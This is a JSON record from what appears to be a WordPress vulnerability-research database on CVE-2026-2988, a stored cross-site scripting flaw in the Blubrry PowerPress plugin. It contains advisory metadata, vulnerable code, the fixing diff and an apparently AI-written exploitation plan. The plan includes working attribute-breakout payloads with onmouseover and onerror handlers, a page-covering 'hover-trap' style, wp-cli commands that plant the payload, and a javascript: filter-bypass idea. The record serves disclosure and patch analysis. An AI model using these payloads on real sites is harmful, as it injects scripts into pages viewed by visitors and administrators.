[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fx_KZcaFZ91wAQqOtaAOdmOL-oRI9OQxHWkUfi0R9KFM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-2988","blubrry-powerpress-authenticated-contributor-stored-cross-site-scripting-via-powerpress-and-podcast-shortcodes","Blubrry PowerPress \u003C= 11.15.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via powerpress and podcast Shortcodes","The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","powerpress",null,"\u003C=11.15.15","11.15.16","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 13:33:12","2026-04-08 02:25:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fde25459d-9e19-4e3e-982f-0b34fa89dc30?source=api-prod",1,[22,23,24,25],"powerpress-player.php","powerpress.php","readme.txt","version.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-2988\n\n## 1. Vulnerability Summary\nThe **Blubrry PowerPress Podcasting** plugin (versions \u003C= 11.15.15) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[powerpress]` and `[podcast]` shortcodes. The vulnerability exists because the shortcode handler, `powerpress_shortcode_handler`, accepts user-supplied attributes (such as `image`, `width`, and `height`) and passes them into HTML rendering filters without adequate sanitization or output escaping. While the plugin attempts to block `javascript:` protocols, it fails to prevent attribute breakouts (e.g., using `\"` to inject event handlers like `onmouseover`).\n\n## 2. Attack Vector Analysis\n- **Shortcodes:** `[powerpress]`, `[podcast]`, and `[display_podcast]`.\n- **Vulnerable Parameters:** `url`, `image`, `width`, `height`.\n- **Authentication Level:** Contributor or higher (any role with `edit_posts` capability).\n- **Endpoint:** `wp-admin\u002Fpost.php` (to save the post) and the frontend post URL (to trigger the XSS).\n- **Preconditions:** The plugin must be active. The `process_podpress` setting may need to be enabled for the `display_podcast` shortcode, but `powerpress` and `podcast` are typically available by default.\n\n## 3. Code Flow\n1. **Entry Point:** A Contributor saves a post containing a shortcode: \n   `[powerpress url=\"http:\u002F\u002Fexample.com\u002Faudio.mp3\" width='1\" onmouseover=\"alert(1)\"']`.\n2. **Registration:** `powerpressplayer_init()` (in `powerpress-player.php`) registers the shortcode handlers via `add_shortcode`.\n3. **Processing:** When the post is viewed, WordPress calls `powerpress_shortcode_handler($attributes, $content)` (in `powerpress-player.php`).\n4. **Weak Sanitization:** The handler runs a filter that only checks for the `javascript:` prefix:\n   ```php\n   $attributes = array_filter($attributes, function ($var) {\n       $var_without_whitespace = preg_replace(\"\u002F\\s+\u002F\", \"\", $var);\n       if (strpos($var_without_whitespace, 'javascript:') === 0) {\n           return ''; \u002F\u002F Only blocks javascript: protocol\n       } else {\n           return $var;\n       }\n   });\n   ```\n5. **Sink:** The attributes are extracted and passed to the `powerpress_player` filter:\n   ```php\n   $return = apply_filters('powerpress_player', '', ..., array('image'=>$image, 'type'=>$content_type,'width'=>$width, 'height'=>$height) );\n   ```\n6. **Rendering:** The filter handlers (e.g., `powerpressplayer_mediaobjects_video` or default MediaElement.js templates) take these raw strings and echo them into HTML attributes (e.g., `\u003Cvideo width=\"...\" ...>`). Because `width` was not cast to an integer or escaped with `esc_attr()`, the injected `\"` breaks out of the attribute.\n\n## 4. Nonce Acquisition Strategy\nCreating or editing a post via the web UI requires a WordPress core nonce (`_wpnonce`). Since this is a Stored XSS vulnerability initiated by an authenticated user, the agent should use the following strategy:\n\n1. **Role Context:** Authenticate as a **Contributor**.\n2. **Action:** Navigate to the \"Add New Post\" page.\n3. **Nonce Extraction:**\n   - Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n   - Use `browser_eval` to extract the core nonce: `browser_eval(\"document.querySelector('#_wpnonce').value\")`.\n4. **Alternative (Recommended for PoC):** Use `wp-cli` to bypass the need for nonce extraction during the *injection* phase, then use the `http_request` tool to verify the *execution* phase as a Guest or Admin.\n\n## 5. Exploitation Strategy\n### Step 1: Inject Payload\nUse `wp-cli` to create a post with a malicious shortcode. This simulates a Contributor saving a post.\n\n**Payload 1 (Attribute Breakout in `width`):**\n```text\n[powerpress url=\"https:\u002F\u002Fcontent.blubrry.com\u002Fblubrrypreview\u002Ftranscript_test_episode.mp3\" width='1\" onmouseover=\"alert(`XSS_WIDTH`)\" style=\"display:block;width:1000px;height:1000px;border:1px solid red;\"']\n```\n\n**Payload 2 (Attribute Breakout in `image`):**\n```text\n[podcast url=\"https:\u002F\u002Fcontent.blubrry.com\u002Fblubrrypreview\u002Ftranscript_test_episode.mp3\" image='https:\u002F\u002Fexample.com\u002Ffake.jpg\" onerror=\"alert(`XSS_IMAGE`)\"']\n```\n\n### Step 2: Trigger XSS\nAccess the newly created post URL using the `http_request` tool.\n\n**Request:**\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]`\n- **Headers:** User-Agent of a victim (e.g., Admin) or Guest.\n\n### Step 3: Identify Execution\nVerify that the response contains the unescaped payload.\n- Expected string in HTML: `width=\"1\" onmouseover=\"alert(`XSS_WIDTH`)\"`\n\n## 6. Test Data Setup\n1. **Create User:**\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Create Post (Payload):**\n   `wp post create --post_type=post --post_status=publish --post_title=\"Podcast Episode\" --post_author=$(wp user get attacker --field=ID) --post_content='[powerpress url=\"https:\u002F\u002Fcontent.blubrry.com\u002Fblubrrypreview\u002Ftranscript_test_episode.mp3\" width=\"1\\\" onmouseover=\\\"alert(document.domain)\\\" style=\\\"position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;\\\"\"]'`\n\n## 7. Expected Results\n- The HTTP response from the post URL will contain the injected JavaScript event handler.\n- The `width` attribute will be rendered as `width=\"1\"`.\n- The `onmouseover` attribute will be present: `onmouseover=\"alert(document.domain)\"`.\n- Because of the injected `style` attribute, the entire page becomes a \"hover-trap,\" triggering the alert immediately upon mouse movement.\n\n## 8. Verification Steps\n1. **Verify Storage:**\n   `wp post get [POST_ID] --field=post_content`\n2. **Verify Output (CLI):**\n   Execute a request and grep for the breakout:\n   `curl -s http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID] | grep \"onmouseover=\\\"alert\"`\n3. **Verify Output (Agent):**\n   Use `http_request` and check if `body` contains `onmouseover=\"alert(document.domain)\"`.\n\n## 9. Alternative Approaches\nIf the `width` attribute is stripped or cast to an integer in a specific environment:\n1. **The `image` attribute:** Use `[powerpress image='x\" onerror=\"alert(1)\"']`. PowerPress often renders the image as a `poster` attribute in a `\u003Cvideo>` tag or a `src` in an `\u003Cimg>` tag.\n2. **The `url` attribute:** Although checked for `javascript:`, the check is weak. Try:\n   `[powerpress url=\"   javascript:alert(1)\"]` (The `preg_replace` might fail depending on character encoding or specific whitespace bypasses like `%0a`).\n3. **The `height` attribute:** Identical breakout logic to `width`.","The Blubrry PowerPress Podcasting plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via shortcode attributes such as 'width', 'height', and 'image' in versions up to 11.15.15. Authenticated attackers with contributor-level permissions or higher can inject arbitrary scripts into posts that execute in the context of any user viewing the page.","\u002F\u002F powerpress-player.php:134\nif (is_array($attributes)) {\n    $attributes = array_filter($attributes, function ($var) {\n        $var_without_whitespace = preg_replace(\"\u002F\\s+\u002F\", \"\", $var);\n        if (strpos($var_without_whitespace, 'javascript:') === 0) {\n            return '';\n        } else {\n            return $var;\n        }\n    });\n}\n\n---\n\n\u002F\u002F powerpress-player.php:831\n\u002F\u002F For thumbnail image, use the podcast artwork\nif( !empty($EpisodeData['image']) )\n{\n    $addhtml .= '\u003Cmeta itemprop=\"thumbnailURL\" content=\"'.$EpisodeData['image'] .'\" \u002F>'.PHP_EOL_WEB;\n}\n\nif( !empty($EpisodeData['size']) )\n{\n    $addhtml .= '\u003Cmeta itemprop=\"contentSize\" content=\"'.$EpisodeData['size'] .'\" \u002F>'.PHP_EOL_WEB;\n}\n\n\u002F\u002F \u003Cmeta itemprop=\"videoQuality\" content=\"HD\"\u002F>\nif( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )\n{\n    $addhtml .= '\u003Cmeta itemprop=\"height\" content=\"'.$EpisodeData['height'] .'\" \u002F>'.PHP_EOL_WEB;\n}\n\nif( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )\n{\n    $addhtml .= '\u003Cmeta itemprop=\"width\" content=\"'.$EpisodeData['width'] .'\" \u002F>'.PHP_EOL_WEB;\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpress\u002F11.15.15\u002Fpowerpress-player.php\t2026-02-12 15:03:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpress\u002F11.15.16\u002Fpowerpress-player.php\t2026-03-03 15:05:34.000000000 +0000\n@@ -134,11 +134,14 @@\n \t\t\t'channel' => '',\n \t\t\t'slug' => '',\n \t\t\t'image' => '',\n-\t\t\t'width' => '',\n+\t\t            'width' => '',\n \t\t\t'height' => '',\n             'sample' => ''\n \t\t), $attributes ) );\n-\t\t\n+\n+    $url = esc_url_raw($url);\n+    $image = esc_url_raw($image);\n+\n \tif( empty($channel) && !empty($feed) ) \u002F\u002F Feed for backward compat.\n \t\t$channel = $feed;\n \tif( !empty($slug) ) \u002F\u002F Foward compatibility\n@@ -147,8 +150,8 @@\n \tif( !$url && $content )\n \t{\n \t\t$content_url = trim($content);\n-\t\tif( @parse_url($content_url) )\n-\t\t\t$url = $content_url;\n+\t\tif( filter_var($content_url, FILTER_VALIDATE_URL) )\n+\t\t\t$url = esc_url_raw($content_url);\n \t}\n \t\n \tif( $url && !$sample )\n@@ -176,7 +179,7 @@\n \t\tif( !empty($width) )\n \t\t\t$EpisodeData['width'] = $width;\n \t\tif( !empty($height) )\n-\t\t\t$EpisodeData['height'] = $height;\n+\t\t            $EpisodeData['height'] = $height;\n \t\tif (!empty($url)) {\n             $EpisodeData['url'] = $url;\n         }\n@@ -332,29 +335,25 @@\n \t\treturn '';\n \t}\n \t\n-\t$width = 0;\n-\t$height = 0;\n-\tif( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )\n-\t\t$width = $EpisodeData['width'];\n-\tif( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )\n-\t\t$height = $EpisodeData['height'];\n+\t    $width = absint($EpisodeData['width'] ?? 0);\n+\t    $height = absint($EpisodeData['height'] ?? 0);\n \t\n \t\u002F\u002F More efficient, only pull the general settings if necessary\n \tif( $height == 0 || $width == 0 )\n \t{\n-\t\t$GeneralSettings = get_option('powerpress_general');\n+\t\t$GeneralSettings = get_option('powerpress_general', []);\n \t\tif( $width == 0 )\n \t\t{\n \t\t\t$width = 400;\n \t\t\tif( !empty($GeneralSettings['player_width']) )\n-\t\t\t\t$width = $GeneralSettings['player_width'];\n+\t\t\t\t$width = absint($GeneralSettings['player_width']);\n \t\t}\n \t\t\n \t\tif( $height == 0 )\n \t\t{\n \t\t\t$height = 400;\n \t\t\tif( !empty($GeneralSettings['player_height']) )\n-\t\t\t\t$height = $GeneralSettings['player_height'];\n+\t\t\t\t$height = absint($GeneralSettings['player_height']);\n \t\t}\n \t\t\n \t\t$extension = powerpressplayer_get_extension($EpisodeData['url']);\n@@ -389,8 +388,8 @@\n     $iframeTitle = esc_attr( __('Blubrry Podcast Player', 'powerpress') );\n \t$embed .= '\u003Ciframe';\n \t\u002F\u002F$embed .= ' class=\"powerpress-player-embed\"';\n-\t$embed .= ' width=\"'. htmlspecialchars($width) .'\"';\n-\t$embed .= ' height=\"'. htmlspecialchars($height) .'\"';\n+\t$embed .= ' width=\"'. absint($width) .'\"';\n+\t$embed .= ' height=\"'. absint($height) .'\"';\n \t$embed .= ' src=\"'. htmlspecialchars($url) .'\"';\n     $embed .= ' title=\"'. htmlspecialchars($iframeTitle) .'\"';\n \t$embed .= ' frameborder=\"0\" scrolling=\"no\"';\n@@ -821,12 +820,12 @@\n             $addhtml .= '\u003Cmeta itemprop=\"description\" content=\"' . htmlspecialchars($subtitle) . '\" \u002F>' . PHP_EOL_WEB;\n         }\n \t}\n-\t$addhtml .= '\u003Cmeta itemprop=\"contentUrl\" content=\"'. htmlspecialchars($media_url) .'\" \u002F>'.PHP_EOL_WEB;\n+\t$addhtml .= '\u003Cmeta itemprop=\"contentUrl\" content=\"'. esc_url($media_url) .'\" \u002F>'.PHP_EOL_WEB;\n \t\n \t\u002F\u002F For thumbnail image, use the podcast artwork\n \tif( !empty($EpisodeData['image']) )\n \t{\n-\t\t$addhtml .= '\u003Cmeta itemprop=\"thumbnailURL\" content=\"'.$EpisodeData['image'] .'\" \u002F>'.PHP_EOL_WEB;\n+\t\t$addhtml .= '\u003Cmeta itemprop=\"thumbnailURL\" content=\"'. esc_url($EpisodeData['image']) .'\" \u002F>'.PHP_EOL_WEB;\n \t}\n \t\n \tif( !empty($EpisodeData['size']) )\n@@ -837,12 +836,12 @@\n \t\u002F\u002F \u003Cmeta itemprop=\"videoQuality\" content=\"HD\"\u002F>\n \tif( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )\n \t{\n-\t\t$addhtml .= '\u003Cmeta itemprop=\"height\" content=\"'.$EpisodeData['height'] .'\" \u002F>'.PHP_EOL_WEB;\n+\t\t$addhtml .= '\u003Cmeta itemprop=\"height\" content=\"'. absint($EpisodeData['height']) .'\" \u002F>'.PHP_EOL_WEB;\n \t}\n \t\n \tif( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )\n \t{\n-\t\t$addhtml .= '\u003Cmeta itemprop=\"width\" content=\"'.$EpisodeData['width'] .'\" \u002F>'.PHP_EOL_WEB;\n+\t\t$addhtml .= '\u003Cmeta itemprop=\"width\" content=\"'. absint($EpisodeData['width']) .'\" \u002F>'.PHP_EOL_WEB;\n \t}","The exploit requires an attacker with 'edit_posts' capability (Contributor or higher). \n\n1. The attacker creates or edits a post and inserts a PowerPress shortcode, such as `[powerpress]`, `[podcast]`, or `[display_podcast]`.\n2. The attacker includes a malicious payload in one of the shortcode's attributes (e.g., `width`, `height`, or `image`) that utilizes double quotes to break out of the HTML attribute and inject an event handler.\n3. Example payload: `[powerpress width='1\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:1000px;height:1000px;\"']`.\n4. When the post is saved, the plugin stores this malicious string. \n5. When an administrator or guest views the post, the plugin renders the attribute directly into the HTML without proper escaping, causing the browser to execute the injected JavaScript (e.g., when the mouse moves over the player area).","gemini-3-flash-preview","2026-04-17 20:49:33","2026-04-17 20:50:06",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","11.15.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpress\u002Ftags\u002F11.15.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpress.11.15.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpress\u002Ftags\u002F11.15.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpress.11.15.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpress\u002Ftags"]